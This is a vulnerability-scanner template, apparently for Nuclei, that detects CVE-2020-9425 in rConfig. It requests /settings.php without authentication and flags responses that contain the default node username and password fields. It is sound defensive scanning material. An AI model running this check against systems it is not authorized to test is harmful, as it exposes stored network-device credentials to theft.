24 lines
524 B
YAML
24 lines
524 B
YAML
id: CVE-2020-9425
|
|
info:
|
|
name: rConfig Unauthenticated Sensitive Information Disclosure
|
|
author: madrobot
|
|
severity: high
|
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9425
|
|
tags: cve,cve2020,rconfig
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/settings.php"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "defaultNodeUsername"
|
|
- "defaultNodePassword"
|
|
condition: and
|
|
part: body
|